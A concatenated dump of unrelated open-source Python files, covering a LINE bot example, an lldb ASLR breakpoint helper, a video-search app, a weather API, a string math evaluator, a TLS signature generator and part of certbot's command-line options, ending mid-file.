cl.login(name="mybot", qr=True)
data = {
"name": None,
"old": None,
}
@cl.hooks(type=26, filters=Filters.command("start") & Filters.private)
async def start_conversation(client, msg):
await client.talk.sendMessage(msg.from_, "Hello stranger, what your name?")
"""
This method triggers the conversation.
Note: type must be 26 (Receive Message) and use this in a private chat
using Filters.private
<func>:
cl.poll.conversation(....
args func:
msg = (Message, required), Message from this conversation
callback = (callable, required), function for the next conversation step
done = (bool, optional), pass True if you want this conversation to end
"""
client.poll.conversation(msg, callback_name)
async def callback_name(msg):
data["name"] = msg.text
await asyncio.sleep(1.3)
await cl.talk.sendMessage(msg.from_, "Okay, now how old are you?")
# done=True: after the user sends their age this conversation will end
cl.poll.conversation(msg, callback_old, done=True)
async def callback_old(msg):
data["old"] = msg.text
await cl.talk.sendMessage(msg.from_,
"Nice too meet you, {} now i know your name and old {}".format(
data["name"], data["old"]))
cl.poll.streams()
``` |
{
"source": "4masaka/iREll",
"score": 2
} |
#### File: iREll/src/irell.py
```python
import lldb
import argparse
def __lldb_init_module(debugger, internal_dict):
debugger.HandleCommand("command script add -f irell.bb bb -h 'set breakpoint at address considering ASLR'")
def bb(debugger, command, result, internal_dict):
debugger = lldb.debugger
target = debugger.GetSelectedTarget()
loaded_address = target.GetModuleAtIndex(0).GetSectionAtIndex(1).GetLoadAddress(target)
aslr_slide = loaded_address - 0x100000000
parser = argparse.ArgumentParser(prog="")
parser.add_argument("address")
args = parser.parse_args(command.split())
lldb.debugger.HandleCommand (f"br set -a {int(args.address, 16)+aslr_slide}")
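# Usage sketch inside an lldb session (the path and address are hypothetical):
#   (lldb) command script import src/irell.py
#   (lldb) bb 0x100004f20   # breaks at 0x100004f20 plus the computed ASLR slide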
``` |
{
"source": "4masaka/pyne",
"score": 2
} |
#### File: pyne/tests/test_client.py
```python
import pytest
from frugal.context import FContext
from pyne.client import Client
pytestmark = pytest.mark.asyncio
@pytest.fixture
def client():
"""
Client
"""
client = Client()
return client
@pytest.mark.skip(reason="skipped because it requires the login flow")
async def test_get_auth_qrcode(client: Client):
"""`getAuthQrcode`のテストコード
この関数で実際にAPIとの疎通が出来るか確認する
"""
res = await client.login_with_qrcode()
print(client.headers)
``` |
{
"source": "4ML-ndvr/ndvr",
"score": 2
} |
#### File: 4ML-ndvr/ndvr/app.py
```python
import os
import random
import string
import glob
import itertools as it
import click
from jina.flow import Flow
RANDOM_SEED = 14
def input_index_data(patterns, size):
def iter_file_exts(ps):
return it.chain.from_iterable(glob.iglob(p, recursive=True) for p in ps)
d = 0
if isinstance(patterns, str):
patterns = [patterns]
for g in iter_file_exts(patterns):
yield g.encode()
d += 1
if size is not None and d > size:
break
def config():
os.environ["PARALLEL"] = str(2)
os.environ["SHARDS"] = str(2)
os.environ["COLOR_CHANNEL_AXIS"] = str(0)
os.environ["JINA_PORT"] = os.environ.get("JINA_PORT", str(45678))
os.environ["WORKDIR"] = "./workspace"
os.makedirs(os.environ["WORKDIR"], exist_ok=True)
@click.command()
@click.option("--task", "-t")
@click.option("--num_docs", "-n", default=10)
def main(task, num_docs):
config()
DATA_BLOB = "./index-videos/*.mp4"
if task == "index":
f = Flow().load_config("flow-index.yml")
with f:
f.index(input_fn=input_index_data(DATA_BLOB, size=num_docs), batch_size=2)
elif task == "query":
f = Flow().load_config("flow-query.yml")
f.use_rest_gateway()
with f:
f.block()
elif task == "dryrun":
f = Flow.load_config("flow-query.yml")
with f:
pass
else:
raise NotImplementedError(
f"unknown task: {task}. A valid task is either `index` or `query` or `dryrun`."
)
if __name__ == "__main__":
main()
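# Example invocations (a sketch; the counts are illustrative):
#   python app.py -t index -n 8   # index up to 8 videos matching ./index-videos/*.mp4
#   python app.py -t query        # start the REST gateway and wait for queries
#   python app.py -t dryrun       # only load the query flow and exit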
```
#### File: ndvr/craft/keyframe_extractor.py
```python
from Katna.video import Video
def get_keyframes_from_video(video_path, num_frames):
video = Video()
images = video.extract_frames_as_images(num_frames, video_path)
return images
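# Usage sketch (the video path and frame count are assumptions):
#   frames = get_keyframes_from_video("./index-videos/sample.mp4", num_frames=5)
#   # frames is the list of extracted keyframe images returned by Katna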
``` |
{
"source": "4mr0m3r0/fast-api-weather",
"score": 3
} |
#### File: fast-api-weather/api/weather_api.py
```python
from typing import Optional
from fastapi import Depends
from pydantic import BaseModel
import fastapi
from model.validation_error import ValidationError
from services import openweather_service
router = fastapi.APIRouter()
class Location(BaseModel):
city: str
state: Optional[str] = None
country: str = 'US'
@router.get('/api/weather/{city}', name='weather')
async def index(location: Location = Depends(), units: Optional[str] = 'metric'):
try:
return await openweather_service.get_report_async(
city=location.city,
state=location.state,
country=location.country,
units=units
)
except ValidationError as failure:
return fastapi.Response(content=failure.error_msg, status_code=failure.status_code)
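# Request sketch against a locally running app (host and port are assumptions):
#   GET http://localhost:8000/api/weather/Portland?country=US&units=metric
# The city comes from the path; state, country and units come from the query string.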
```
#### File: fast-api-weather/services/openweather_service.py
```python
from typing import Optional
import httpx
from httpx import Response
from model.validation_error import ValidationError
api_key: Optional[str] = None
async def get_report_async(city: str, state: Optional[str], country: str, units: str) -> dict:
if state:
query = f'{city},{state},{country}'
else:
query = f'{city},{country}'
url = f'https://api.openweathermap.org/data/2.5/weather?q={query}&appid={api_key}&units={units}'
async with httpx.AsyncClient() as client:
resp: Response = await client.get(url)
if resp.status_code != 200:
raise ValidationError(resp.text, status_code=resp.status_code)
resp.raise_for_status()
data = resp.json()
return data
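# Minimal usage sketch (the API key is a placeholder, not part of the service):
#   import asyncio
#   from services import openweather_service
#
#   async def demo():
#       openweather_service.api_key = "YOUR_OPENWEATHER_KEY"
#       report = await openweather_service.get_report_async(
#           city="Portland", state="OR", country="US", units="metric")
#       print(report["main"]["temp"])
#
#   asyncio.run(demo())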
``` |
{
"source": "4Mugala/file_extension_search",
"score": 4
} |
#### File: 4Mugala/file_extension_search/main.py
```python
import datetime
import glob
class Filexts:
'''
This class scans files of a single given file extension or file type.
This class takes two arguments:
(1) root_dir: a directory glob string where the search starts, and
(2) search_depth: the number of directory levels to scan below root_dir; optional, defaults to 1.
'''
def __init__(self, root_dir, search_depth = 1):
self.root_dir = root_dir
self.star = self.root_dir.find('*')
self.all_files = []
self.fix = '*/'
for i in range(search_depth):
self.next_dir()
def list(self):
return self.all_files
def __getitem__(self, index):
return self.all_files[index]
def next_dir(self):
self.search_dir = glob.glob(self.root_dir)
for self.file in self.search_dir:
if self.file not in self.all_files:
self.all_files.append(self.file)
else:
pass
# deepen the glob pattern (insert '*/' before the '*') so the next pass scans one level lower
self.root_dir = (
self.root_dir[:self.star]
+ self.fix
+ self.root_dir[self.star:])
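# Usage sketch (the glob pattern is an assumption):
#   finder = Filexts("/home/user/*.txt", search_depth=2)
#   for path in finder:
#       print(path)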
``` |
{
"source": "4mugala/InStringMath",
"score": 4
} |
#### File: 4mugala/InStringMath/main.py
```python
def is_num(value):
try:
float(value)
return True
except:
return False
def is_neg(value):
if value < 0:
return True
else:
return False
def is_math(expression, operators):
c = 0
if expression:
for i in expression:
if not c % 2:
try:
float(i)
except:
return False
else:
if i in operators:
pass
else:
return False
c += 1
return True
else:
return False
class BitupleOverflow(Exception):
pass
class Bituple:
def __init__(self, bituple):
if len(bituple) > 2:
raise BitupleOverflow(f"Bituple length too big ({len(bituple)}), must be 2")
else:
self.bituple = bituple
def first(self):
return self.bituple[0]
def last(self):
return self.bituple[1]
class Listext(list):
    ''' Listext (list extension) '''
def __init__(self, value):
if type(value) == str:
super().__init__(value.split(" "))
else:
super().__init__(value)
self.__remove_spaces()
def __remove_spaces(self):
self.reduce([x for x in self if x], 0, len(self))
def has(self, *args):
for i in args:
if i not in self:
return False
return True
def is_homogeneous(self):
t = None
for i in self:
if t == None:
t = type(i)
elif type(i) != t and t != None:
return False
return True
def before(self, index):
return self[index - 1]
def after(self, index):
return self[index + 1]
def is_bound(self, index, *, left=False, right=False):
if not right and not left:
if self[index] == self.head() or self[index] == self.tail():
return True
elif right:
if self[index] == self.tail():
return True
elif left:
if self[index] == self.head():
return True
else:
return False
def reduce(self, value, start, stop):
if type(value) == list:
self[start:stop] = [*value]
else:
self[start:stop] = [value]
def head(self):
return self[0]
def tail(self):
return self[len(self) - 1]
def where(self, value1, value2=None, *, s=None):
if value1 in self:
if not s:
return self.index(value1)
else:
try:
return self.index(value1, s)
except:
return -1
elif value2 in self:
if not s:
return self.index(value2)
else:
return self.index(value2, s)
else:
return -1
def rwhere(self, value1, value2):
def inner(value):
c = len(self) - 1
for i in self:
if self[c] == value:
return c
c -= 1
return -1
v1 = inner(value1)
if is_neg(v1):
return inner(value2)
else:
return v1
def copy(self):
return Listext(self)
class InStringMath:
def __init__(self, expression):
self.solvable = False
self.operas = ["**", "^", "*", "×", "/", "÷",
"+", "-", "√"]
self.answer = "0.0"
self.start_pos = 0
self.expression = self.__beautify(expression)
if self.expression.tail() not in self.operas:
self.brackets(self.expression)
def __str__(self):
return self.answer
def __beautify(self, raw_expression):
def beautify_str():
beautiful_expr = ""
c = 0
for i in raw_expression:
if i == "(":
beautiful_expr += " " + i + " "
elif i == ")":
beautiful_expr += " " + i + " "
elif i == "^":
beautiful_expr += " " + i + " "
elif i == "*" and raw_expression[c-1] == "*":
beautiful_expr += i + " "
elif i == "*" and raw_expression[c+1] == "*":
beautiful_expr += " " + i
elif i == "/":
beautiful_expr += " " + i + " "
elif i == "√":
beautiful_expr += " " + i + " "
else:
beautiful_expr += i
c += 1
return beautiful_expr
def beautify_listext(expression):
expression = expression.split()
c = 0
for i in expression:
if i == "(" and c != 0:
if is_num(expression[c-1]):
expression.insert(c, "*")
elif i == ")" and c != len(expression) - 1:
if is_num(expression[c+1]):
expression.insert(c+1, "*")
elif i == ")" and expression[c+1] == "(":
expression.insert(c+1, "*")
c += 1
return Listext(expression)
if type(raw_expression) == str:
raw_expression = beautify_str()
raw_expression = beautify_listext(raw_expression)
else:
pass
return Listext(raw_expression)
def __brackets(self, expression):
o_brac = expression.rwhere("(", "[")
c_brac = expression.where(")", "]", s=o_brac)
if not is_neg(o_brac) and not is_neg(c_brac):
if is_math(expression[o_brac+1: c_brac],
self.operas):
ans = InStringMath(expression[o_brac+1: c_brac])
print(ans.equals(), ["BRACKETS"])
self.expression.reduce(str(ans), o_brac, c_brac+1)
o_brac = self.expression.where("(", "[")
c_brac = self.expression.where(")", "]")
if not is_neg(o_brac + c_brac):
self.__brackets(self.expression)
o_brac = self.expression.where("(", "[")
c_brac = self.expression.where(")", "]")
if is_neg(o_brac) and is_neg(c_brac):
self.no_brackets = True
else:
self.no_brackets = False
def __exponent(self, expression):
index = expression.where("**", "^")
if not is_neg(index):
if not expression.is_bound(index):
before_sign = expression.before(index)
after_sign = expression.after(index)
if is_num(before_sign) and is_num(after_sign):
ans = float(before_sign) ** float(after_sign)
print(ans, "[EXPONENTIAL]")
expression.reduce(str(ans), index-1, index+2)
if not is_neg(self.expression.where("**", "^")):
self.__exponent(self.expression)
def __multiply_and_divide(self, expression):
        ''' This method handles the precedence of multiplication and division. '''
index1 = expression.where("*", "×")
index2 = expression.where("/", "÷")
if index1 != -1 and index2 == -1:
index = index1
elif index2 != -1 and index1 == -1:
index = index2
elif index1 != -1 and index2 != -1:
if index1 < index2:
index = index1
else:
index = index2
else:
index = -1
if index == expression.where("*", "×"):
self.__multiply(expression, index)
elif index == expression.where("/", "÷"):
self.__divide(expression, index)
if not is_neg(index):
self.__multiply_and_divide(self.expression)
def __multiply(self, expression, index):
if not expression.is_bound(index):
before_sign = expression.before(index)
after_sign = expression.after(index)
if is_num(before_sign) and is_num(after_sign):
ans = float(before_sign) * float(after_sign)
print(ans, "[MULTIPLICATION]")
expression.reduce(str(ans), index-1, index+2)
def __divide(self, expression, index):
if not expression.is_bound(index):
before_sign = expression.before(index)
after_sign = expression.after(index)
if is_num(before_sign) and is_num(after_sign):
ans = float(before_sign) / float(after_sign)
print(ans, "[DIVISION]")
expression.reduce(str(round(ans, 6)), index-1, index+2)
def __add_and_substract(self, expression):
        ''' This method handles the precedence of addition and subtraction. '''
index1 = expression.where("+")
index2 = expression.where("-")
if not is_neg(index1) and is_neg(index2):
index = index1
elif not is_neg(index2) and is_neg(index1):
index = index2
elif not is_neg(index1) and not is_neg(index2):
if index1 < index2:
index = index1
else:
index = index2
else:
index = -1
if index == expression.where("+"):
self.__add(expression, index)
elif index == expression.where("-"):
self.__substract(expression, index)
if not is_neg(index):
self.__add_and_substract(self.expression)
def __add(self, expression, index):
if not expression.is_bound(index):
before_sign = expression.before(index)
after_sign = expression.after(index)
if is_num(before_sign) and is_num(after_sign):
ans = float(before_sign) + float(after_sign)
print(ans, "[ADDITION]")
expression.reduce(str(ans), index-1, index+2)
def __substract(self, expression, index):
if not expression.is_bound(index):
before_sign = expression.before(index)
after_sign = expression.after(index)
if is_num(before_sign) and is_num(after_sign):
ans = float(before_sign) - float(after_sign)
                print(ans, "[SUBTRACTION]")
expression.reduce(str(ans), index-1, index+2)
def __root(self, expression, index):
if not expression.is_bound(index, right=True):
before_sign = expression.before(index)
after_sign = expression.after(index)
if is_num(before_sign) and is_num(after_sign):
ans = float(after_sign) ** (1 /float(before_sign))
print(ans, "[R]")
expression.reduce(str(ans), index-1, index+2)
elif not is_num(before_sign) and is_num(after_sign):
ans = float(after_sign) ** (1 / 2)
print(ans, "[R]")
expression.reduce(str(ans), index, index+2)
def is_root(self, value):
if value.startswith("√"):
return True
else:
return False
def equals(self):
if self.solvable:
return "{}".format(float(self.answer))
else:
return "_._"
def brackets(self, expression):
self.__brackets(expression)
if self.no_brackets and is_math(expression, self.operas):
self.exponential(expression)
def exponential(self, expression):
self.__exponent(expression)
self.multiplication_and_division(expression)
def multiplication_and_division(self, expression):
self.__multiply_and_divide(expression)
self.addition_and_substraction(expression)
def addition_and_substraction(self, expression):
self.__add_and_substract(expression)
self.answer = self.expression[0]
self.solvable = True
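
# Usage sketch: operands and the + and - operators must be space-separated in the
# input string, since __beautify only inserts spaces around brackets, ^, *, / and √.
if __name__ == "__main__":
    expr = InStringMath("2 + 3 * (4 - 1)")
    print(expr.equals())  # expected: 11.0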
``` |
{
"source": "4mYHime/tls-sig-api-python",
"score": 2
} |
#### File: 4mYHime/tls-sig-api-python/TLSSigAPI.py
```python
import base64
import zlib
import json
import time
# The python ecdsa library can be downloaded from https://github.com/warner/python-ecdsa
# or from the link shared by TLS technical support: http://share.weiyun.com/24b674bced4f84ecbbe6a7945738b9f4
# After downloading, enter its root directory and run the following command to install:
# python setup.py install
# The following command converts the private key format:
# openssl ec -outform PEM -inform PEM -in private.pem -out private_ec.pem
# -in takes the downloaded private key, -out is the converted private key file
from ecdsa import SigningKey,util
import hashlib
# Fill in your application's own private key here
ecdsa_pri_key = """
your_private_key
"""
def base64_encode_url(data):
base64_data = base64.b64encode(data)
# type(base64_data) ->bytes
base64_data = bytes.decode(base64_data).replace('+', '*')
base64_data = base64_data.replace('/', '-')
base64_data = base64_data.replace('=', '_')
return base64_data
def base64_decode_url(base64_data):
base64_data = base64_data.replace('*', '+')
base64_data = base64_data.replace('-', '/')
base64_data = base64_data.replace('_', '=')
raw_data = base64.b64decode(base64_data)
return raw_data
class TLSSigAPI:
""""""
__acctype = 0
__identifier = ""
__appid3rd = ""
__sdkappid = 0
__version = 20190114
    __expire = 3600*24*30  # default is one month; adjust as needed
__pri_key = ""
__pub_key = ""
_err_msg = "ok"
def __get_pri_key(self):
return self.__pri_key_loaded
def __init__(self, sdkappid, pri_key):
self.__sdkappid = sdkappid
self.__pri_key = pri_key
self.__pri_key_loaded = SigningKey.from_pem(self.__pri_key)
def __create_dict(self):
m = {}
m["TLS.account_type"] = "%d" % self.__acctype
m["TLS.identifier"] = "%s" % self.__identifier
m["TLS.appid_at_3rd"] = "%s" % self.__appid3rd
m["TLS.sdk_appid"] = "%d" % self.__sdkappid
m["TLS.expire_after"] = "%d" % self.__expire
m["TLS.version"] = "%d" % self.__version
m["TLS.time"] = "%d" % time.time()
return m
def __encode_to_fix_str(self, m):
fix_str = "TLS.appid_at_3rd:" + m["TLS.appid_at_3rd"] + "\n" \
+ "TLS.account_type:" + m["TLS.account_type"] + "\n" \
+ "TLS.identifier:" + m["TLS.identifier"] + "\n" \
+ "TLS.sdk_appid:" + m["TLS.sdk_appid"] + "\n" \
+ "TLS.time:" + m["TLS.time"] + "\n" \
+ "TLS.expire_after:" + m["TLS.expire_after"] + "\n"
return fix_str
def tls_gen_sig(self, identifier):
self.__identifier = identifier
m = self.__create_dict()
fix_str = self.__encode_to_fix_str(m)
pk_loaded = self.__get_pri_key()
sig_field = pk_loaded.sign(fix_str.encode(), hashfunc=hashlib.sha256, sigencode=util.sigencode_der)
sig_field_base64 = base64.b64encode(sig_field)
s2 = bytes.decode(sig_field_base64)
m["TLS.sig"] = s2
json_str = json.dumps(m)
# type(json_str) -> str
sig_cmpressed = zlib.compress(json_str.encode()) # json_str bytes-like -> bytes
# type(sig_cmpressed) ->bytes
base64_sig = base64_encode_url(sig_cmpressed) # sig_cmpressed bytes-like -> bytes
return base64_sig
def main():
api = TLSSigAPI(1400001052, ecdsa_pri_key)
sig = api.tls_gen_sig("xiaojun")
    print(sig)
if __name__ == "__main__":
main()
``` |
{
"source": "4n3i5v74/certbot",
"score": 3
} |
#### File: _internal/cli/group_adder.py
```python
from certbot._internal.cli.verb_help import VERB_HELP
def _add_all_groups(helpful):
helpful.add_group("automation", description="Flags for automating execution & other tweaks")
helpful.add_group("security", description="Security parameters & server settings")
helpful.add_group("testing",
description="The following flags are meant for testing and integration purposes only.")
helpful.add_group("paths", description="Flags for changing execution paths & servers")
helpful.add_group("manage",
description="Various subcommands and flags are available for managing your certificates:",
verbs=["certificates", "delete", "renew", "revoke", "update_symlinks"])
# VERBS
for verb, docs in VERB_HELP:
name = docs.get("realname", verb)
helpful.add_group(name, description=docs["opts"])
```
#### File: _internal/cli/__init__.py
```python
import argparse
import logging
import logging.handlers
import sys
from typing import Optional
import certbot
from certbot._internal import constants
from certbot._internal.cli.cli_constants import ARGPARSE_PARAMS_TO_REMOVE
from certbot._internal.cli.cli_constants import cli_command
from certbot._internal.cli.cli_constants import COMMAND_OVERVIEW
from certbot._internal.cli.cli_constants import DEPRECATED_OPTIONS
from certbot._internal.cli.cli_constants import EXIT_ACTIONS
from certbot._internal.cli.cli_constants import HELP_AND_VERSION_USAGE
from certbot._internal.cli.cli_constants import LEAUTO
from certbot._internal.cli.cli_constants import new_path_prefix
from certbot._internal.cli.cli_constants import old_path_fragment
from certbot._internal.cli.cli_constants import SHORT_USAGE
from certbot._internal.cli.cli_constants import VAR_MODIFIERS
from certbot._internal.cli.cli_constants import ZERO_ARG_ACTIONS
from certbot._internal.cli.cli_utils import _Default
from certbot._internal.cli.cli_utils import _DeployHookAction
from certbot._internal.cli.cli_utils import _DomainsAction
from certbot._internal.cli.cli_utils import _EncodeReasonAction
from certbot._internal.cli.cli_utils import _PrefChallAction
from certbot._internal.cli.cli_utils import _RenewHookAction
from certbot._internal.cli.cli_utils import _user_agent_comment_type
from certbot._internal.cli.cli_utils import add_domains
from certbot._internal.cli.cli_utils import CaseInsensitiveList
from certbot._internal.cli.cli_utils import config_help
from certbot._internal.cli.cli_utils import CustomHelpFormatter
from certbot._internal.cli.cli_utils import flag_default
from certbot._internal.cli.cli_utils import HelpfulArgumentGroup
from certbot._internal.cli.cli_utils import nonnegative_int
from certbot._internal.cli.cli_utils import parse_preferred_challenges
from certbot._internal.cli.cli_utils import read_file
from certbot._internal.cli.group_adder import _add_all_groups
from certbot._internal.cli.helpful import HelpfulArgumentParser
from certbot._internal.cli.paths_parser import _paths_parser
from certbot._internal.cli.plugins_parsing import _plugins_parsing
from certbot._internal.cli.subparsers import _create_subparsers
from certbot._internal.cli.verb_help import VERB_HELP
from certbot._internal.cli.verb_help import VERB_HELP_MAP
from certbot._internal.plugins import disco as plugins_disco
import certbot._internal.plugins.selection as plugin_selection
import certbot.plugins.enhancements as enhancements
logger = logging.getLogger(__name__)
# Global, to save us from a lot of argument passing within the scope of this module
helpful_parser: Optional[HelpfulArgumentParser] = None
def prepare_and_parse_args(plugins, args, detect_defaults=False):
"""Returns parsed command line arguments.
:param .PluginsRegistry plugins: available plugins
:param list args: command line arguments with the program name removed
:returns: parsed command line arguments
:rtype: argparse.Namespace
"""
helpful = HelpfulArgumentParser(args, plugins, detect_defaults)
_add_all_groups(helpful)
# --help is automatically provided by argparse
helpful.add(
None, "-v", "--verbose", dest="verbose_count", action="count",
default=flag_default("verbose_count"), help="This flag can be used "
"multiple times to incrementally increase the verbosity of output, "
"e.g. -vvv.")
helpful.add(
None, "-t", "--text", dest="text_mode", action="store_true",
default=flag_default("text_mode"), help=argparse.SUPPRESS)
helpful.add(
None, "--max-log-backups", type=nonnegative_int,
default=flag_default("max_log_backups"),
help="Specifies the maximum number of backup logs that should "
"be kept by Certbot's built in log rotation. Setting this "
"flag to 0 disables log rotation entirely, causing "
"Certbot to always append to the same log file.")
helpful.add(
None, "--preconfigured-renewal", dest="preconfigured_renewal",
action="store_true", default=flag_default("preconfigured_renewal"),
help=argparse.SUPPRESS
)
helpful.add(
[None, "automation", "run", "certonly", "enhance"],
"-n", "--non-interactive", "--noninteractive",
dest="noninteractive_mode", action="store_true",
default=flag_default("noninteractive_mode"),
help="Run without ever asking for user input. This may require "
"additional command line flags; the client will try to explain "
"which ones are required if it finds one missing")
helpful.add(
[None, "register", "run", "certonly", "enhance"],
constants.FORCE_INTERACTIVE_FLAG, action="store_true",
default=flag_default("force_interactive"),
help="Force Certbot to be interactive even if it detects it's not "
"being run in a terminal. This flag cannot be used with the "
"renew subcommand.")
helpful.add(
[None, "run", "certonly", "certificates", "enhance"],
"-d", "--domains", "--domain", dest="domains",
metavar="DOMAIN", action=_DomainsAction,
default=flag_default("domains"),
help="Domain names to apply. For multiple domains you can use "
"multiple -d flags or enter a comma separated list of domains "
"as a parameter. The first domain provided will be the "
"subject CN of the certificate, and all domains will be "
"Subject Alternative Names on the certificate. "
"The first domain will also be used in "
"some software user interfaces and as the file paths for the "
"certificate and related material unless otherwise "
"specified or you already have a certificate with the same "
"name. In the case of a name collision it will append a number "
"like 0001 to the file path name. (default: Ask)")
helpful.add(
[None, "run", "certonly", "register"],
"--eab-kid", dest="eab_kid",
metavar="EAB_KID",
help="Key Identifier for External Account Binding"
)
helpful.add(
[None, "run", "certonly", "register"],
"--eab-hmac-key", dest="eab_hmac_key",
metavar="EAB_HMAC_KEY",
help="HMAC key for External Account Binding"
)
helpful.add(
[None, "run", "certonly", "manage", "delete", "certificates",
"renew", "enhance"], "--cert-name", dest="certname",
metavar="CERTNAME", default=flag_default("certname"),
help="Certificate name to apply. This name is used by Certbot for housekeeping "
"and in file paths; it doesn't affect the content of the certificate itself. "
"To see certificate names, run 'certbot certificates'. "
"When creating a new certificate, specifies the new certificate's name. "
"(default: the first provided domain or the name of an existing "
"certificate on your system for the same domains)")
helpful.add(
[None, "testing", "renew", "certonly"],
"--dry-run", action="store_true", dest="dry_run",
default=flag_default("dry_run"),
help="Perform a test run of the client, obtaining test (invalid) certificates"
" but not saving them to disk. This can currently only be used"
" with the 'certonly' and 'renew' subcommands. \nNote: Although --dry-run"
" tries to avoid making any persistent changes on a system, it "
" is not completely side-effect free: if used with webserver authenticator plugins"
" like apache and nginx, it makes and then reverts temporary config changes"
" in order to obtain test certificates, and reloads webservers to deploy and then"
" roll back those changes. It also calls --pre-hook and --post-hook commands"
" if they are defined because they may be necessary to accurately simulate"
" renewal. --deploy-hook commands are not called.")
helpful.add(
["register", "automation"], "--register-unsafely-without-email", action="store_true",
default=flag_default("register_unsafely_without_email"),
help="Specifying this flag enables registering an account with no "
"email address. This is strongly discouraged, because you will be "
"unable to receive notice about impending expiration or "
"revocation of your certificates or problems with your Certbot "
"installation that will lead to failure to renew.")
helpful.add(
["register", "update_account", "unregister", "automation"], "-m", "--email",
default=flag_default("email"),
help=config_help("email"))
helpful.add(["register", "update_account", "automation"], "--eff-email", action="store_true",
default=flag_default("eff_email"), dest="eff_email",
help="Share your e-mail address with EFF")
helpful.add(["register", "update_account", "automation"], "--no-eff-email",
action="store_false", default=flag_default("eff_email"), dest="eff_email",
help="Don't share your e-mail address with EFF")
helpful.add(
["automation", "certonly", "run"],
"--keep-until-expiring", "--keep", "--reinstall",
dest="reinstall", action="store_true", default=flag_default("reinstall"),
help="If the requested certificate matches an existing certificate, always keep the "
"existing one until it is due for renewal (for the "
"'run' subcommand this means reinstall the existing certificate). (default: Ask)")
helpful.add(
"automation", "--expand", action="store_true", default=flag_default("expand"),
help="If an existing certificate is a strict subset of the requested names, "
"always expand and replace it with the additional names. (default: Ask)")
helpful.add(
"automation", "--version", action="version",
version="%(prog)s {0}".format(certbot.__version__),
help="show program's version number and exit")
helpful.add(
["automation", "renew"],
"--force-renewal", "--renew-by-default", dest="renew_by_default",
action="store_true", default=flag_default("renew_by_default"),
help="If a certificate "
"already exists for the requested domains, renew it now, "
"regardless of whether it is near expiry. (Often "
"--keep-until-expiring is more appropriate). Also implies "
"--expand.")
helpful.add(
"automation", "--renew-with-new-domains", dest="renew_with_new_domains",
action="store_true", default=flag_default("renew_with_new_domains"),
help="If a "
"certificate already exists for the requested certificate name "
"but does not match the requested domains, renew it now, "
"regardless of whether it is near expiry.")
helpful.add(
"automation", "--reuse-key", dest="reuse_key",
action="store_true", default=flag_default("reuse_key"),
help="When renewing, use the same private key as the existing "
"certificate.")
helpful.add(
["automation", "renew", "certonly"],
"--allow-subset-of-names", action="store_true",
default=flag_default("allow_subset_of_names"),
help="When performing domain validation, do not consider it a failure "
"if authorizations can not be obtained for a strict subset of "
"the requested domains. This may be useful for allowing renewals for "
"multiple domains to succeed even if some domains no longer point "
"at this system. This option cannot be used with --csr.")
helpful.add(
"automation", "--agree-tos", dest="tos", action="store_true",
default=flag_default("tos"),
help="Agree to the ACME Subscriber Agreement (default: Ask)")
helpful.add(
["unregister", "automation"], "--account", metavar="ACCOUNT_ID",
default=flag_default("account"),
help="Account ID to use")
helpful.add(
"automation", "--duplicate", dest="duplicate", action="store_true",
default=flag_default("duplicate"),
help="Allow making a certificate lineage that duplicates an existing one "
"(both can be renewed in parallel)")
helpful.add(
["automation", "renew", "certonly", "run"],
"-q", "--quiet", dest="quiet", action="store_true",
default=flag_default("quiet"),
help="Silence all output except errors. Useful for automation via cron."
" Implies --non-interactive.")
# overwrites server, handled in HelpfulArgumentParser.parse_args()
helpful.add(["testing", "revoke", "run"], "--test-cert", "--staging",
dest="staging", action="store_true", default=flag_default("staging"),
help="Use the staging server to obtain or revoke test (invalid) certificates; equivalent"
" to --server " + constants.STAGING_URI)
helpful.add(
"testing", "--debug", action="store_true", default=flag_default("debug"),
help="Show tracebacks in case of errors, and allow certbot-auto "
"execution on experimental platforms")
helpful.add(
[None, "certonly", "run"], "--debug-challenges", action="store_true",
default=flag_default("debug_challenges"),
help="After setting up challenges, wait for user input before "
"submitting to CA")
helpful.add(
"testing", "--no-verify-ssl", action="store_true",
help=config_help("no_verify_ssl"),
default=flag_default("no_verify_ssl"))
helpful.add(
["testing", "standalone", "manual"], "--http-01-port", type=int,
dest="http01_port",
default=flag_default("http01_port"), help=config_help("http01_port"))
helpful.add(
["testing", "standalone"], "--http-01-address",
dest="http01_address",
default=flag_default("http01_address"), help=config_help("http01_address"))
helpful.add(
["testing", "nginx"], "--https-port", type=int,
default=flag_default("https_port"),
help=config_help("https_port"))
helpful.add(
"testing", "--break-my-certs", action="store_true",
default=flag_default("break_my_certs"),
help="Be willing to replace or renew valid certificates with invalid "
"(testing/staging) certificates")
helpful.add(
"security", "--rsa-key-size", type=int, metavar="N",
default=flag_default("rsa_key_size"), help=config_help("rsa_key_size"))
helpful.add(
"security", "--key-type", choices=['rsa', 'ecdsa'], type=str,
default=flag_default("key_type"), help=config_help("key_type"))
helpful.add(
"security", "--elliptic-curve", type=str, choices=[
'secp256r1',
'secp384r1',
'secp521r1',
], metavar="N",
default=flag_default("elliptic_curve"), help=config_help("elliptic_curve"))
helpful.add(
"security", "--must-staple", action="store_true",
dest="must_staple", default=flag_default("must_staple"),
help=config_help("must_staple"))
helpful.add(
["security", "enhance"],
"--redirect", action="store_true", dest="redirect",
default=flag_default("redirect"),
help="Automatically redirect all HTTP traffic to HTTPS for the newly "
"authenticated vhost. (default: redirect enabled for install and run, "
"disabled for enhance)")
helpful.add(
"security", "--no-redirect", action="store_false", dest="redirect",
default=flag_default("redirect"),
help="Do not automatically redirect all HTTP traffic to HTTPS for the newly "
"authenticated vhost. (default: redirect enabled for install and run, "
"disabled for enhance)")
helpful.add(
["security", "enhance"],
"--hsts", action="store_true", dest="hsts", default=flag_default("hsts"),
help="Add the Strict-Transport-Security header to every HTTP response."
" Forcing browser to always use SSL for the domain."
" Defends against SSL Stripping.")
helpful.add(
"security", "--no-hsts", action="store_false", dest="hsts",
default=flag_default("hsts"), help=argparse.SUPPRESS)
helpful.add(
["security", "enhance"],
"--uir", action="store_true", dest="uir", default=flag_default("uir"),
help='Add the "Content-Security-Policy: upgrade-insecure-requests"'
' header to every HTTP response. Forcing the browser to use'
' https:// for every http:// resource.')
helpful.add(
"security", "--no-uir", action="store_false", dest="uir", default=flag_default("uir"),
help=argparse.SUPPRESS)
helpful.add(
"security", "--staple-ocsp", action="store_true", dest="staple",
default=flag_default("staple"),
help="Enables OCSP Stapling. A valid OCSP response is stapled to"
" the certificate that the server offers during TLS.")
helpful.add(
"security", "--no-staple-ocsp", action="store_false", dest="staple",
default=flag_default("staple"), help=argparse.SUPPRESS)
helpful.add(
"security", "--strict-permissions", action="store_true",
default=flag_default("strict_permissions"),
help="Require that all configuration files are owned by the current "
"user; only needed if your config is somewhere unsafe like /tmp/")
helpful.add(
